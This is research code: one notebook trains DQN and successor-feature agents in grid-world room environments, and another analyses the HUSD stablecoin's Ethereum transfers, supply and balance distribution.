# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: venv-MPSF # language: python # name: venv-mpsf # --- # + import sys,os sys.path.append('../') from deep_rl import * import matplotlib.pyplot as plt import torch from tqdm import trange, tqdm import random import numpy as np # %load_ext autoreload # %reload_ext autoreload # %autoreload 2 # !mkdir log layout = 'open' if layout == '3rooms' or layout == '3roomsh': cell_num = 101 max_step_dqn = 1e5 linear_schedule_dqn = 6e4 elif layout == 'maze': cell_num = 75 max_step_dqn = 1.5e5 linear_schedule_dqn = 9e4 else: cell_num = 104 max_step_dqn = 7e4 linear_schedule_dqn = 4e4 # + import pickle def store_agent(obj, agent_name, layout=layout): print('storing network') pickle.dump(obj, open(''+agent_name+ '.p', 'wb')) def load_agent(agent_name): print('loading network') filename = agent_name + '.p' return pickle.load(open(''+filename, 'rb')) # - print(f'{[1, 1]}') # + import numpy as np import torch from tqdm import trange, tqdm import sys sys.path.append('../..') from deep_rl.network import * learning_rate_dqn = 2e-3 #from 0.05 - 0.001 max_step_dqn = 1e5 linear_schedule_dqn = 6e4 def dqn_feature(config, **kwargs): # pre-defined config must be passed to the function assert config is not None # generate_tag(kwargs) kwargs.setdefault('log_level', 0) config.merge(kwargs) config.task_fn = lambda: Task(config.game, default_w=config.default_w) config.eval_env = config.task_fn() try: lr = config.lr except: lr = 2e-3 config.optimizer_fn = lambda params: torch.optim.RMSprop(params, lr) config.network_fn = lambda: DQNCNN(config.action_dim, SRIdentityBody(config.state_dim), \ hidden_units=(2000,)) # config.network_fn = lambda: VanillaNet(config.action_dim, FCBody(config.state_dim, hidden_units=(16,))) config.replay_fn = lambda: AsyncReplay(memory_size=int(1e5), batch_size=10) config.random_action_prob = LinearSchedule(1.0, 0.1, config.linear_schedule) config.discount = 0.9 config.target_network_update_freq = 200 config.exploration_steps = 0 # config.double_q = True config.double_q = False config.sgd_update_frequency = 4 config.gradient_clip = 5 config.eval_interval = int(5e3) config.max_steps = config.max_steps config.async_actor = False agent = DQNAgent(config) #run_steps function below config = agent.config agent_name = agent.__class__.__name__ t0 = time.time() # agent.step() # plt.figure(figsize=(10,4)) try: agent.network = load_agent(f'./collector_agent/dqn/layout:{config.game}-w:{config.default_w}') except: while True: # print(agent.actor._task.env.envs[0].goal) if config.save_interval and not agent.total_steps % config.save_interval: agent.save('data/%s-%s-%d' % (agent_name, config.tag, agent.total_steps)) if config.log_interval and not agent.total_steps % config.log_interval: t0 = time.time() if config.eval_interval and not agent.total_steps % config.eval_interval: agent.eval_episodes() pass if config.max_steps and agent.total_steps >= config.max_steps: store_agent(agent.network, f'./collector_agent/dqn/layout:{config.game}-w:{config.default_w}') return agent break agent.step() # plt.title('step: {}'.format(agent.total_steps), fontsize=20) # plt.imshow(agent.actor._task.env.envs[0].render(), cmap='Blues', ) agent.switch_task() return agent # - config = Config() config.DEVICE = torch.device('cpu') config.game = 'FourRoomsCollect' config.linear_schedule = 6e4 config.max_steps = 1e5 config.default_w = [1, 1] # ### Experiment # + ''' 1. First we train 3 different DQN's ''' config = Config() config.DEVICE = torch.device('cpu') config.game = 'FourRoomsCollect' config.linear_schedule = 4e4 config.max_steps = 7e4 config.default_w = [1, 1] dqn0 = dqn_feature(config) config = Config() config.DEVICE = torch.device('cpu') config.game = 'FourRoomsCollect' config.linear_schedule = 7e4 config.max_steps = 1.5e5 config.default_w = [-1, 1] dqn1 = dqn_feature(config) config = Config() config.DEVICE = torch.device('cpu') config.game = 'FourRoomsCollect' config.linear_schedule = 7e4 config.max_steps = 1.5e5 config.default_w = [1, 0] dqn2 = dqn_feature(config) # + class SRNetCNN_MultiChannel(nn.Module): """ Added by Surya. SR fully connected body network. """ def __init__(self, output_dim, body, hidden_units=(3000,), gate=F.relu, config=0): """ config -> type of learning on top of state abstraction 0 - typical SR with weights sharing 1 - learning SR without weights sharing """ super(SRNetCNN_MultiChannel, self).__init__() self.body = body self.output_dim = output_dim self.width = 13 self.init_channels = int(self.body.feature_dim / np.square(self.width)) # CNN layers self.conv1 = nn.Conv2d(self.init_channels, 128, 3, 1) self.conv2 = nn.Conv2d(128, 256, 3, 1) # self.conv3 = nn.Conv2d(64, 128, 3, 1) self.fc_size = 256 * ((self.width - (3-1)*2) // 2) ** 2 # FC layers dims = (self.fc_size,) + hidden_units + (body.feature_dim * output_dim,) # print(self.fc_size, hidden_units, body.feature_dim, output_dim) # print(dims) self.layers = nn.ModuleList( [layer_init(nn.Linear(dim_in, dim_out)) for dim_in, dim_out in zip(dims[:-1], dims[1:])]) print(self.layers) self.gate = gate self.feature_dim = body.feature_dim * output_dim if(config == 0): self.psi2q = Psi2QNet(output_dim, body.feature_dim) if(config == 1): self.psi2q = Psi2QNetFC(output_dim, body.feature_dim) self.to(Config.DEVICE) def forward(self, x): # print(x.shape, 'original shape') phi = self.body(tensor(x)) # shape: b x state_dim psi = phi # print(psi.shape, 'after body shape') # Convert to image psi = psi.view(phi.size(0), self.init_channels, self.width, self.width) # Conv layers psi = self.conv1(psi) # print(psi.shape, 'after conv1') psi = F.relu(psi) psi = self.conv2(psi) # print(psi.shape, 'after conv2') psi = F.relu(psi) psi = F.max_pool2d(psi, 2) # print(psi.shape, 'after pooling') psi = torch.flatten(psi, 1) # FC layers for layer in self.layers[:-1]: psi = self.gate(layer(psi)) psi = self.layers[-1](psi) # print(f'debug : {psi.shape}, {psi.size(0)}, {self.output_dim}, {self.body.feature_dim}') psi = psi.view(psi.size(0), self.output_dim, self.body.feature_dim) # shape: b x action_dim x state_dim # print(f'after view shape : {psi.shape}') out = self.psi2q(psi) return phi, psi, out # + max_step_avdsr = 5e5 linear_schedule_avdsr = 5e5 learning_rate_avdsr = 1e-3 #from 0.05 - 0.001 def avdsr_feature_A(**kwargs): kwargs['tag'] = 'Training avDSR based on DQN agents' generate_tag(kwargs) kwargs.setdefault('log_level', 0) config = Config() config.merge(kwargs) config.task_fn = lambda: Task(config.game) config.eval_env = config.task_fn() config.c = 1 config.optimizer_fn = lambda params: torch.optim.RMSprop(params, learning_rate_avdsr) # config.network_fn = lambda: SRNet(config.action_dim, SRIdentityBody(config.state_dim), \ # hidden_units=(), config=0) #CHECK config.network_fn = lambda: SRNetCNN_MultiChannel(config.action_dim, SRIdentityBody(config.state_dim), \ hidden_units=(3000,), config=config.style) #CHECK config.replay_fn = lambda: Replay(memory_size=int(3e5), batch_size=10) config.random_action_prob = LinearSchedule(1, 1, linear_schedule_avdsr) # CHECK config.discount = 0.99 config.target_network_update_freq = 200 config.exploration_steps = 0 config.double_q = False config.sgd_update_frequency = 4 config.gradient_clip = 5 config.max_steps = max_step_avdsr config.async_actor = False agent = avDSRAgent(config, config.agents, style='DQN') #run_steps function below config = agent.config agent_name = agent.__class__.__name__ t0 = time.time() # agent.network = load_agent('avdsr-A') try: agent.network = load_agent(f'./collector_agent/avdsr/layout:{config.game}-w:{len(config.agents)}') except: while True: if config.log_interval and not agent.total_steps % config.log_interval: agent.logger.info('steps %d, %.2f steps/s' % (agent.total_steps, config.log_interval / (time.time() - t0))) t0 = time.time() if config.max_steps and agent.total_steps >= config.max_steps: store_agent(agent.network, f'./collector_agent/avdsr/layout:{config.game}-w:{len(config.agents)}') return agent break # import pdb; pdb.set_trace() agent.step() agent.switch_task() # - store_agent(avdsr.network, f'./collector_agent/avdsr/layout:FourRoomsCollectNoTerm-w:3') avdsr = avdsr_feature_A(game='FourRoomsCollectNoTerm', agents=[dqn0, dqn1, dqn2], choice=0, style=0) # + from deep_rl.component.fourrooms import * from deep_rl.component.fourrooms_collect import * g = [21, 28, 84, 91] room1, room2, room3 = [], [], [] num = 0 agent_to_check = avdsr if layout == '4rooms': num = 104 c = np.ones(104)*4 room1 = list(range(5)) + list(range(10,15)) + list(range(20,25)) + list(range(31,36)) +list(range(41,46)) room2 = list(range(5,10)) + list(range(15,20)) + list(range(26,31)) + list(range(36,41)) + list(range(46,51)) + list(range(52,57)) room3 = list(range(57,62)) + list(range(63,68)) + list(range(73,78)) + list(range(83,88)) + list(range(94,99)) connect = [25, 51, 62, 88] c[room1] = 1 c[room2] = 2 c[room3] = 3 c[connect] = [-1, -3, -5, -7] elif layout == '3roomsh': num = 101 c = np.ones(101)*4 room1 = list(range(0,22)) room2 = list(range(23,67)) room3 = list(range(68,101)) connect = [22, 67] c[room1] = 1 c[room2] = 2 c[room3] = 3 c[connect] = [-1, -3] elif layout == 'maze': num = 75 c = np.ones(75)*4 room1 = list(range(12)) + [13, 22, 26, 33, 14, 23, 27, 34, 41, 48, 52, 61, 47, 51, 60, 63] + list(range(64, 75)) room2 = list(range(15, 22)) + [24, 28, 35, 42, 49, 25, 32, 40, 46, 50] + list(range(53, 60)) room3 = [29, 30, 31, 37, 38, 43, 44, 45] connect = [12, 62, 36, 39] c[room1] = 1 c[room2] = 2 c[room3] = 3 c[connect] = [-1, -3, -5, -7] elif layout == '3rooms': num = 101 c = np.ones(101)*4 room1 = [0,1,2,9,10,11,83,84,85,92,93,94] + list(range(19, 74, 9)) + list(range(20, 75, 9)) + list(range(21, 76, 9)) room2 = [3,4,5,12,13,14,77,78,79,86,87,88,95,96,97] + list(range(22, 68, 9)) + list(range(23, 69, 9)) + list(range(24, 70, 9)) room3 = [6,7,8,80,81,82,89,90,91,98,99,100] + list(range(16, 71, 9)) + list(range(17,72, 9)) + list(range(18, 73, 9)) connect = [15, 76] c[room1] = 2 c[room2] = 3 c[room3] = 4 c[connect] = [-1, -3] elif layout == '3roomsm': num = 101 c = np.ones(101) * 4 room1 = [0, 1, 9, 10] + list(range(19, 74, 9)) + list(range(20, 75, 9)) + [83, 84, 92, 93] room2 = list(range(2, 6)) + list(range(11, 15)) + list(range(21, 67, 9)) + list(range(22, 68, 9)) + list(range(23, 69, 9)) + list(range(24, 70, 9)) + list(range(76, 80)) + list(range(85, 89)) + list(range(94, 98)) room3 = [6,7,8] + list(range(16, 71, 9)) + list(range(17, 72, 9)) + list(range(18, 73, 9)) + [80, 81, 82, 89, 90, 91, 98, 99, 100] connect = [15, 75] c[room1] = 1 c[room2] = 2 c[room3] = 3 c[connect] = [-1, -1] elif layout == 'open': num = 121 c = np.ones(121) * 4 room1 = list(range(121)) print(len(room1), len(room2), len(room3)) env = ClctFourRooms(layout='open') psi_all = np.zeros((num,169*4*4)) for i in range(num): state = env.reset() env.agent_pos = i _, out, _ = agent_to_check.network(tensor(state).unsqueeze(0)) psi = out.detach().cpu().numpy() psi_all[i,:] = psi.flatten() psi_all.shape from sklearn.decomposition import PCA plt.figure(figsize=(6,6),dpi=100) pca = PCA(n_components=2) k = pca.fit_transform(psi_all) plt.scatter(k[:,0],k[:,1], c=c) plt.xlabel('first principle component', fontsize=14) plt.ylabel('second principle component', fontsize=14) plt.colorbar() plt.title('Principle components of SFs using PCA', fontsize=14) # - loss_lr_em3 = avdsr.loss_vec kernel = 100 plt.plot(convolve(avdsr.loss_vec[20:], kernel)) plt.title('5e4 timesteps, smoothing=' + str(kernel)), plt.show() # + def dsr_feature_init(ref,**kwargs): generate_tag(kwargs) kwargs.setdefault('log_level', 0) config = Config() config.async_actor = False config.merge(kwargs) config.task_fn = lambda: Task(config.game) config.eval_env = config.task_fn() config.c = 1 config.optimizer_fn = lambda params: torch.optim.RMSprop(params, 0.002) config.network_fn = lambda: SRNetCNN_MultiChannel(config.action_dim, SRIdentityBody(config.state_dim), \ hidden_units=(3000,), config=config.style) #CHECK config.replay_fn = lambda: AsyncReplay(memory_size=int(1e5), batch_size=10) config.random_action_prob = LinearSchedule(1.0, 0.1, linear_schedule_dqn) config.discount = 0.99 config.target_network_update_freq = 200 config.exploration_steps = 0 # config.double_q = Truez config.double_q = False config.sgd_update_frequency = 4 config.gradient_clip = 5 config.eval_interval = int(5e3) config.max_steps = max_step_dqn config.async_actor = False agent = DSRAgent(config) #run_steps function below config = agent.config agent_name = agent.__class__.__name__ if(ref is not None): print(agent.network.load_state_dict(ref.network.state_dict(), strict=False)) t0 = time.time() while True: if config.save_interval and not agent.total_steps % config.save_interval: agent.save('data/%s-%s-%d' % (agent_name, config.tag, agent.total_steps)) if config.log_interval and not agent.total_steps % config.log_interval: # agent.logger.info('steps %d, %.2f steps/s' % (agent.total_steps, config.log_interval / (time.time() - t0))) t0 = time.time() if config.eval_interval and not agent.total_steps % config.eval_interval: agent.eval_episodes() if config.max_steps and agent.total_steps >= config.max_steps: return agent break # import pdb; pdb.set_trace() agent.step() agent.switch_task() return agent dsr = dsr_feature_init(ref=avdsr, game='FourRoomsCollect', freeze=2, style=0)
notebooks/experiment.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: master_thesis # language: python # name: master_thesis # --- # # Stablecoin Billionaires<br> Descriptive Analysis of the Ethereum-based Stablecoin ecosystem # ## by <NAME>, 01.07.2020 # # Part IV - HUSD # + import numpy as np import pandas as pd import matplotlib.pyplot as plt from datetime import datetime from collections import Counter from matplotlib import rc import re import random rc('font', **{'family':'serif','serif': ['Computer Modern']}) rc('text', usetex=True) # + #plots tx_over_date = '../plots/husd/husd_txs_over_date.csv' unique_senders_over_date = '../plots/husd/husd_unique_senders_over_date.csv' unique_recipients_over_date = '../plots/husd/husd_unique_recipients_over_date.csv' tx_count_to = '../plots/husd/husd_tx_count_to.csv' tx_count_from = '../plots/husd/husd_tx_count_from.csv' tx_over_date = '../plots/husd/husd_txs_over_date.csv' balances = '../plots/husd/husd_balances.csv' avg_gas_over_date = '../plots/husd/husd_avg_gas_over_date.csv' avg_value_over_date = '../plots/husd/husd_avg_value_over_date.csv' positive_cumulated_balances = '../plots/husd/husd_positive_cumulated_balances.csv' circulating_supply = '../plots/husd/husd_circulating_supply.csv' unique_recipients_per_day_over_date = '../plots/husd/husd_unique_recipients_per_day_over_date.csv' unique_senders_per_day_over_date = '../plots/husd/husd_unique_senders_per_day_over_date.csv' exchanges = '../plots/exchanges.csv' #data transfer = '../data/husd/transfer/0_husd_transfer_8174400-10370273.csv' mint = '../data/husd/issue/husd_issue.csv' burn = '../data/husd/redeem/husd_redeem.csv' # - # <center></center> # # Data df = pd.read_csv(transfer) pd.set_option('display.float_format', lambda x: '%.3f' % x) # ## Basics df['txvalue'] = df['txvalue'].astype(float)/10**8 df.describe() # <center></center> # ## Dataset print('Start:') print('Block: {:^30}\nTimestamp: {:^20}\nUTC Time: {:^25}\n'.format(df['blocknumber'].iloc[0], df['timestamp'].iloc[0], str(datetime.fromtimestamp(df['timestamp'].iloc[0])) )) print('End:') print('Block: {:^30}\nTimestamp: {:^20}\nUTC Time: {:^25}\n'.format(df['blocknumber'].iloc[-1], df['timestamp'].iloc[-1], str(datetime.fromtimestamp(df['timestamp'].iloc[-1])) )) # ## Total Nr. of Blocks print('Total Nr. of Blocks: {}'.format(df['blocknumber'].iloc[-1]-df['blocknumber'].iloc[0])) # <center></center> # ## Total Nr. of Transfer Events print('Total Nr. of Events: {:,.0f}'.format(df.describe().loc['count','timestamp'])) # <center></center> # ## Total Nr. of Addresses print('Total Nr. of Addresses: {}'.format(len(df['txto'].unique()))) # <center></center> # ## Addresses with funds bal = pd.read_csv(balances) print('Total Nr. of Addresses with funds: {}'.format(len(bal[bal['txvalue']>0]))) # <center></center> # ## Avg. Transaction Value print('Avg. Transaction Value: {:,.0f} HUSD'.format(np.mean(df['txvalue']/ 10**8))) # <center></center> # ## Total Gas Costs df['costs'] = (df['gas_price']/10**18) * df['gas_used'] print('Total Gas spent for Transfers: {:,.3f} ether'.format(sum(df['costs']))) # <center></center> # ## Initial HUSD Supply # + #first mint event #0xdc6bb2a1aff2dbb2613113984b5fbd560e582c0a4369149402d7ea83b0f5983e # - # <center></center> # ## Total HUSD Supply sum(pd.read_csv(mint)['txvalue']/10**8)-sum(pd.read_csv(burn)['txvalue']/10**8) # <center></center> # <center></center> # <center></center> # # I. Event analysis # ## I.I. Mint Event # ## Plot new issued tokens over date # + print('\n\n') fig = plt.figure(figsize=(40,25), dpi=250) ax = fig.subplots() plt.grid() plt.title(r'I s s u e d \ \ H U S D'+'\n', size= 120) ax.yaxis.get_offset_text().set_fontsize(50) plt.xlabel('\n'+r'D a t e ', size=120) plt.ylabel(r'H U S D'+'\n', size=120) plt.yticks(fontsize=60) plt.yticks(fontsize=30) plt.xticks(labels=["\nJul '19'","Oct '19","\nJan '20","Apr '20","\nJul '20"], ticks=[0,73,165, 256,347], fontsize=60) def plot_issue_over_date(): _issue = pd.read_csv(mint) iss = _issue.loc[:, ['timestamp', 'txvalue']] iss['utc'] = iss['timestamp'].apply(lambda x: str(datetime.utcfromtimestamp(x))[0:10]) iss = iss.groupby('utc', as_index = False)['txvalue'].sum() a = iss['utc'].iloc[0] b = iss['utc'].iloc[-1] idx = pd.date_range(a,b) iss = iss.set_index('utc') iss.index = pd.DatetimeIndex(iss.index) iss = iss.reindex(idx, fill_value=0) counter = 0 for i in range(0, len(iss)): plt.plot([counter,counter], [0, iss['txvalue'].iloc[counter]/(10**8)], color= 'black', linewidth=3) counter += 1 return plt.tight_layout(pad=5) plot_issue_over_date() plt.savefig('../pics/husd/husd_issued_husd_over_date.pdf') # - # ## Further info df = pd.read_csv(mint) #df[df['txvalue'] == max(df['txvalue'])] print('Issue Events: {}\nIssued HUSD: {:,.0f}\n'.format(len(df), sum(df['txvalue'])/10**8, ':,0f')) print('Largest issue: {:,.0f} HUSD\n . . . to address: {}\n'.format(df.loc[3274, 'txvalue']//10**8,'0x55fe002aeff02f77364de339a1292923a15844b8')) # <center></center> # <center></center> # ## I.II. Burn Event # ## Plot burned tokens over date # + print('\n\n') fig = plt.figure(figsize=(40,25)) ax = fig.subplots() plt.grid() plt.title(r'B u r n e d \ \ H U S D'+'\n', size= 120) ax.yaxis.get_offset_text().set_fontsize(50) plt.xlabel('\n'+r'D a t e', size=120) plt.ylabel(r'H U S D'+'\n', size=120) plt.yticks(fontsize=60) plt.yticks(fontsize=30) plt.xticks(labels=["\nJul '19'","Oct '19","\nJan '20","Apr '20","\nJul '20"], ticks=[0,73,165,256,347], fontsize=60) def plot_burn_over_date(): _dbf = pd.read_csv(burn) dbf = _dbf.loc[:, ['timestamp', 'txvalue']] dbf['utc'] = dbf['timestamp'].apply(lambda x: str(datetime.utcfromtimestamp(x))[0:10]) dbf = dbf.groupby('utc', as_index = False)['txvalue'].sum() a = dbf['utc'].iloc[0] b = dbf['utc'].iloc[-1] idx = pd.date_range(a,b) dbf = dbf.set_index('utc') dbf.index = pd.DatetimeIndex(dbf.index) dbf = dbf.reindex(idx, fill_value=0) counter = 0 for i in range(0, len(dbf)): plt.plot([counter,counter], [0, dbf['txvalue'].iloc[counter]/(10**8)], color= 'black', linewidth=3) counter += 1 return plt.tight_layout(pad=5) plot_burn_over_date() plt.savefig('../pics/husd/husd_burned_husd_over_date.pdf') # - # ## Further info # + df = pd.read_csv(burn) print('Burn Events: {}\nBurned husd: {:,.0f}'.format(len(df), sum(df['txvalue'])/10**8, ':,0f')) print('. . . from {} addesses\n'.format(len(df['address'].unique()))) print('Largest burn: {:,.0f} husd\n . . . from address: {}\n'.format(df.groupby('address')['txvalue'].sum()[0]/10**8,df.groupby("address")["txvalue"].sum().index[0])) # - # <center></center> # <center></center> # ## Plot circulating supply # + print('\n\n') fig = plt.figure(figsize=(20,12), dpi=500) ax = fig.subplots() plt.grid(True) plt.title(r'C i r c u l a t i n g \ \ H U S D \ \ S u p p l y'+'\n', size=60) plt.xlabel('\n'+r'D a t e', size= 60) plt.ylabel(r'H U S D'+'\n', size= 60) ax.yaxis.get_offset_text().set_fontsize(25) plt.yticks(fontsize=30) plt.xticks(labels=["\nJul '19'","Oct '19","\nJan '20","Apr '20","\nJul '20"], ticks=[0,73,165, 256,347], fontsize=30) circ = pd.read_csv(circulating_supply, index_col='Unnamed: 0') plt.plot(range(0, 347), circ['txvalue'].cumsum()/10**8, color='black', linewidth = 4, label = 'HUSD supply') plt.fill_between(range(0, 347),0 , circ['txvalue'].cumsum()/10**8, alpha=0.2, facecolor='#2D728F') lgnd = plt.legend(loc='upper left', fontsize=40) plt.tight_layout(pad=5) plt.savefig('../pics/husd/husd_cirulating_supply.pdf') # - # <center></center> # <center></center> # <center></center> # ## I.III. Transfer Event # ## Plot transfers over date # + print('\n\n') fig = plt.figure(figsize=(20,12), dpi=500) ax = fig.subplots() plt.grid(True) plt.title(r'H U S D \ \ T r a n s f e r s'+'\n', size=60) plt.xlabel('\n'+r'D a t e', size= 50) plt.ylabel(r'T r a n s f e r s'+'\n', size= 50) plt.yticks(np.arange(0, 601, 100), np.vectorize(lambda x: f'{x:,.0f}')(np.arange(0, 601, 100)), fontsize=30) plt.xticks(labels=["\nJul '19'","Oct '19","\nJan '20","Apr '20","\nJul '20"], ticks=[0,73,165, 256,347], fontsize=30) def plot_txs_over_date(df, lwd, label, col = '#2D728F', plusbetween = False): plt.plot(np.arange(0 , len(df['txs'])), df['txs'], color = col, linewidth = lwd, label = label) if plusbetween: plt.fill_between(np.arange(0 , len(df['txs'])),0 , df['txs'], alpha=0.1, facecolor='black') plot_txs_over_date(df = pd.read_csv(tx_over_date, index_col=0), col = 'black', lwd = 2, label = 'Transfers', plusbetween=True) plot_txs_over_date(pd.read_csv(unique_senders_per_day_over_date, index_col='Unnamed: 0'), col='#9DB469', lwd = 2, label = 'Unique Senders per day') plot_txs_over_date(pd.read_csv(unique_recipients_per_day_over_date, index_col='Unnamed: 0'), lwd = 2, label = 'Unique Recipients per day') lgnd = ax.legend(loc='upper right', fontsize=35) lgnd.legendHandles[0].set_linewidth(5.0) lgnd.legendHandles[1].set_linewidth(5.0) lgnd.legendHandles[2].set_linewidth(5.0) plt.tight_layout(pad=5) plt.savefig('../pics/husd/husd_tx_over_date.pdf') plt.show() # - # <center></center> # ## Most active addresses # From: fr = pd.read_csv(tx_count_from, index_col='Unnamed: 0').sort_values('txs', ascending = False) to = pd.read_csv(tx_count_to, index_col='Unnamed: 0').sort_values('txs', ascending = False) fr = pd.DataFrame(fr.loc[:fr.index[10],'txs']) fr['tag'] = ['-', 'Huobi', 'Huobi 2', 'Huobi 9', 'FTX Exchange', 'Huobi 10', 'Burn gate of Huobi', '-', '-', '-', 'Huobi 12'] fr # To: to = pd.DataFrame(to.loc[:to.index[10],'txs']) to['tag'] = ['Huobi', 'Huobi 9', '-', 'Huobi 2', 'Burn gate of Huobi', '-', 'FTX Exchange', '-', 'Huobi 10', '-', '-'] to # <center></center> # <center></center> # ## Activity distribution df_from = pd.read_csv(tx_count_from, index_col=0) df_to = pd.read_csv(tx_count_to, index_col=0) df_all = pd.concat([df_from, df_to]) df = df_all.groupby(df_all.index).sum() print('{} addresses in total'.format(len(df))) df = df.sort_values('txs') gr0 = len(df.loc[df['txs'] >= 500000]) gra = len(df.loc[df['txs'] >= 100000]) - gr0 grb = len(df.loc[df['txs'] >= 50000]) - gr0 - gra grc = len(df.loc[df['txs'] >= 10000]) - gr0 - gra - grb grd = len(df.loc[df['txs'] >= 1000]) - gr0 - gra - grb - grc gre = len(df.loc[df['txs'] >= 100]) - gr0 - gra - grb - grc - grd grf = len(df.loc[df['txs'] >= 10]) - gr0 - gra - grb - grc - grd - gre grg = len(df.loc[df['txs'] <= 10]) grh = len(df.loc[df['txs'] == 1]) pd.DataFrame({'Transactions': ['> 500.000','100.000-500.000', '50.000-100.000', '10.000-50.000', '1.000-10.000', '100-1.000', '10-100', '< 10', '1'], 'Addresses':[gr0,gra,grb,grc,grd,gre,grf,grg,grh] }) # <center></center> # <center></center> # ## Plot average transfer amount # ## Jan '20 - Jul '20 # + print('\n\n') df = pd.read_csv(avg_value_over_date, index_col=0) df = df.loc[df.index[165]:,:] plt.figure(figsize=(12, 7), dpi=800) plt.grid(True) plt.plot(np.arange(0 , len(df.index.tolist())), df['txvalue'], color = 'black', label = 'Avg. Amount/Day', linewidth = 2) plt.fill_between(np.arange(0 , len(df.index.tolist())),0 , df['txvalue'], alpha=0.2, facecolor='#2D728F') plt.xlabel('\n'+'D a t e', fontsize=35) plt.ylabel('H U S D'+'\n', fontsize=30) plt.title("H U S D\nA v g. \ \ T r a n s f e r \ \ A m o u n t"+"\n", size = 30) plt.legend(loc="upper right", fontsize=20, shadow= True) plt.ticklabel_format(style = 'plain') plt.xticks(labels=["\nJan '20","Feb '20","\nMar '20","Apr '20","\nMay '20","Jun '20","\nJul '20"], ticks=[0,31,60,90,121,152,182], fontsize=23) plt.yticks(np.arange(0, 1000001, 200000), np.vectorize(lambda x: f'{x:,.0f}')(np.arange(0, 1000001, 200000)), fontsize=15) plt.tight_layout(pad=1) plt.savefig('../pics/husd/husd_avgtxvalue_jan20.pdf') # - # <center></center> # ## Further Info df.describe() # <center></center> # <center></center> # ## Plot average gas costs # ## Jan '20 - Jul '20 print('\n\n') df = pd.read_csv(avg_gas_over_date, index_col='Unnamed: 0') df = df.loc[df.index[165]:,:] plt.figure(figsize=(12, 7), dpi=800) plt.grid(True) plt.plot(np.arange(0 , len(df.index.tolist())), df['gas'], color = 'black', label = 'Avg. Gas Costs/Day', linewidth = 2) plt.fill_between(np.arange(0 , len(df.index.tolist())),0 , df['gas'], alpha=0.2, facecolor='#2D728F') plt.xlabel('\nD a t e', fontsize=35) plt.ylabel('E t h e r\n', fontsize=30) plt.title('H U S D\nA v g. \ \ G a s \ \ C o s t s\n', size = 30) lgnd = plt.legend(loc='upper left', fontsize=20, shadow= True) plt.ticklabel_format(style = 'plain') plt.xticks(labels=["\nJan '20","Feb '20","\nMar '20","Apr '20","\nMay '20","Jun '20","\nJul '20"], ticks=[0,31,60,90,121,152,182], fontsize=20) plt.yticks(np.arange(0, 0.05, 0.01), np.vectorize(lambda x: f'{x:,.3f}')(np.arange(0, 0.05, 0.01)), fontsize=15) plt.tight_layout(pad=1) lgnd.legendHandles[0].set_linewidth(3.0) plt.savefig('../pics/husd/husd_avggascosts_jan20.pdf') df.describe() # <center></center> # <center></center> # # II. Balances Analysis df = pd.read_csv(positive_cumulated_balances, index_col='Unnamed: 0') df # <center></center> # ## II.I. Quick Summary (df[df['balance']>0]['balance']).describe().apply(lambda x: format(x, 'f')) print('{}/{} with less than 1 husd' .format(len(df[df['balance']<1]['balance']), len(df['balance']))) # <center></center> # ## II.II. Balance Table # + df = pd.read_csv(positive_cumulated_balances, index_col=0) def get_distribution(perc): per = round(df.index[-1]*perc) entities = df.index[-1]- per upper = df.loc[per:,:] lower = df.loc[:per,:] lower_ = lower['cum'].iloc[-1] upper_ = (upper['cum'].iloc[-1] - upper['cum'].iloc[0]) return entities, lower_, upper_, lower_/ upper['cum'].iloc[-1], upper_/(upper['cum'].iloc[-1]) idx90, lower90, upper90, per10, per90 = get_distribution(0.90) idx95, lower95, upper95, per05, per95 = get_distribution(0.95) idx99, lower99, upper99, per01, per99 = get_distribution(0.99) idx999, lower999, upper999, per001, per999 = get_distribution(0.999) df = pd.DataFrame([[f'{idx999:,.0f}', round(per999*100,2), f'{upper999:,.0f}'], [f'{idx99:,.0f}', round(per99*100,2),f'{upper99:,.0f}'], [f'{idx95:,.0f}', round(per95*100,2),f'{upper95:,.0f}'], [f'{idx90:,.0f}', round(per90*100,2),f'{upper90:,.0f}']], index=['0.1% of the richest accounts', '1% of the richest accounts','5% of the richest accounts','10% of the richest accounts'], columns=['Accounts in total', '% of total supply', 'husd amount']) df # - # <center></center> # <center></center> # ## II.III. Rich list # + pd.options.mode.chained_assignment = None df = pd.read_csv(positive_cumulated_balances) balance = df rich = df.loc[df.index[-10]:,:] ex = pd.read_csv(exchanges, header=None) loop = rich.iterrows() for i, j in loop: if j['address'] in ex[0].tolist(): rich.loc[i,'nametag'] = ex[ex[0] == j['address']][1].values[0] rich # - # <center></center> # <center></center> # ## Huobi ex = pd.read_csv(exchanges, header=None) df = ex.loc[0:73,:] bal = 0 for i in df[0]: val = balance['balance'][balance['address'] == i] if not val.empty: bal += balance['balance'][balance['address'] == i].values[0] else: pass print('Huobi Total Balance: {:.0f}\n{:.2f}% of Total'.format(bal, bal/balance.loc[balance.index[-1], 'cum']*100)) # <center></center> # ## Binance df = ex.loc[74:88,:] bal = 0 for i in df[0]: val = balance['balance'][balance['address'] == i] if not val.empty: bal += balance['balance'][balance['address'] == i].values[0] else: pass print('Binance Total Balance: {:.0f}\n{:.2f}% of Total'.format(bal, bal/balance.loc[balance.index[-1], 'cum']*100)) # <center></center> # ## Bitfinex df = ex.loc[89:110,:] bal = 0 for i in df[0]: val = balance['balance'][balance['address'] == i] if not val.empty: bal += balance['balance'][balance['address'] == i].values[0] else: pass print('Bitfinex Total Balance: {:.0f}\n{:.2f}% of Total'.format(bal, bal/balance.loc[balance.index[-1], 'cum']*100)) # <center></center> # ## OKEx df = ex.loc[111:115,:] bal = 0 for i in df[0]: val = balance['balance'][balance['address'] == i] if not val.empty: bal += balance['balance'][balance['address'] == i].values[0] else: pass print('OKEx Total Balance: {:.0f}\n{:.2f}% of Total'.format(bal, bal/balance.loc[balance.index[-1], 'cum']*100)) # <center></center> # ## Bittrex df = ex.loc[116:119,:] bal = 0 for i in df[0]: val = balance['balance'][balance['address'] == i] if not val.empty: bal += balance['balance'][balance['address'] == i].values[0] else: pass print('Bittrex Total Balance: {:.0f}\n{:.2f}% of Total'.format(bal, bal/balance.loc[balance.index[-1], 'cum']*100)) # <center></center> # ## Compound df = ex.loc[151:179,:] bal = 0 for i in df[0]: val = balance['balance'][balance['address'] == i] if not val.empty: bal += balance['balance'][balance['address'] == i].values[0] else: pass print('Compound Total Balance: {:.0f}\n{:.2f}% of Total'.format(bal, bal/balance.loc[balance.index[-1], 'cum']*100)) # <center></center> # ## Poloniex df = ex.loc[247:266,:] bal = 0 